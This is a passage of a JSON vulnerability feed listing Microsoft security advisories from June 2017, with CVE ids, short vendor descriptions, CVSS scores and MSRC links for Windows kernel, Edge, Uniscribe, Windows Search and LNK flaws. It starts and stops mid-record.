"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-0296"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0296", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0296", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit the vulnerability, the attacker could send specially crafted messages to the Windows Search service. An attacker with access to a target computer could exploit this vulnerability to elevate privileges and take control of the computer. Additionally, in an enterprise scenario, a remote unauthenticated attacker could remotely trigger the vulnerability through an SMB connection and then take control of a target computer.\n\nThe security update addresses the vulnerability by correcting how Windows Search handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Search Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8543", "CVE-2017-8529"], "modified": "2017-07-11T07:00:00", "id": "MS:CVE-2017-8543", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8543", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8492", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8492", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8492", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nAn authenticated attacker could exploit this vulnerability by running a specially crafted application.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-28T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8554"], "modified": "2017-06-28T07:00:00", "id": "MS:CVE-2017-8554", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8554", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.\n\nThe security update addresses the vulnerability by correcting how the Windows kernel initializes memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0299", "CVE-2017-8529"], "modified": "2017-08-08T07:00:00", "id": "MS:CVE-2017-0299", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0299", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins. The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP) restrictions, and to allow requests that should otherwise be ignored. An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how affected Microsoft Edge handles different-origin requests.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8523", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8523", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8523", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThere are multiple ways an attacker could exploit this vulnerability:\n\n * In a web-based attack scenario, an attacker could host a specially crafted website designed to exploit this vulnerability and then convince a user to view the website. An attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an email or instant message that takes users to the attacker's website, or by opening an attachment sent through email.\n * In a file-sharing attack scenario, an attacker could provide a specially crafted document file designed to exploit this vulnerability and then convince a user to open the document file.\n\nThe security update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n\nNote that for the Office products listed in the Affected Products table, where the severity is indicated as Critical, the Preview Pane is an attack vector for this vulnerability.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Uniscribe Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0283", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0283", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0283", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0286", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0286", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files.\n\nTo exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver.\n\nThe update addresses the vulnerability by correcting how Windows handles cabinet files.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0294", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0294", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0294", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8520", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8520", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8520", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8484"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8484", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8484", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8475", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8475", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8475", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8477", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8477", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8477", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8470", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8470", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8470", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed.\n\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThe attacker could present to the user a removable drive, or remote share, that contains a malicious .LNK file and an associated malicious binary. When the user opens this drive(or remote share) in Windows Explorer, or any other application that parses the .LNK file, the malicious binary will execute code of the attacker\u2019s choice, on the target system.\n\nThe security update addresses the vulnerability by correcting the processing of shortcut LNK references.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "LNK Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8464", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8464", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n\nThe update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Uniscribe Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0285", "CVE-2017-8529"], "modified": "2017-07-03T07:00:00", "id": "MS:CVE-2017-0285", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0285", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": 